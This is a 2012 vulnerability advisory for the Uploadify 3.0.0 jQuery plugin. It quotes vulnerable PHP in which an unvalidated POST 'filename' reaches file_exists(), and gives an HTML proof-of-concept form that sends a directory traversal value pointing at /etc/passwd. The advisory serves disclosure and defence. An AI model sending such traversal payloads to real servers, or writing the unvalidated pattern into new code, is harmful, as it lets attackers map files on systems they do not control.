File Existence Disclosure in Uploadify 3.0.0

File Existence Disclosure in Uploadify 3.0.0

I. DESCRIPTION

Uploadify is a jQuery plugin that integrates a fully-customizable multiple file upload utility on your website. It uses a mixture of Javascript, ActionScript, and any server-side language to dynamically create an instance over any DOM element on a page. http://www.uploadify.com/

—————————————

II. TESTED VERSION

Affected is Uploadify version 3.0.0.

—————————————

III. EXPLOIT

1. File Existence Disclosure vulnerability in « uploadify-check-exists.php »

Reason: missing input data validation

Attack vector: user submitted POST parameter « filename »

Preconditions: none

Result: attacker can reveal existance of files and directories on remote system

 

Source code snippet from  script « uploadify-check-exists.php »:

—————–[ source code start ]———————————

if (file_exists($_SERVER[‘DOCUMENT_ROOT’] . ‘/uploads/’ . $_POST[‘filename’])) {

echo 1;

} else {

echo 0;

}

—————–[ source code end ]———————————–

We can see, that user submitted POST parameter « filename » is used in argument for php function « file_exists() ». There is no input data validation, therefore attacker can use directory traversal and reveal existence of arbitrary files and directories on affected system.

Test:

—————–[ PoC code start ]———————————–

<html><body><center>
<form action= »http://localhost/uploadify-v3.0.0/uploadify-check-exists.php » method= »post »> <input type= »hidden » name= »filename » value= »../../../../../../../../etc/passwd »>
<input type= »submit » value= »Test »>
</form>
</center></body></html>

—————————————

V. REFERENCES

Author: Janek Vind « waraxe »
Date: 05. April 2012
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-82.html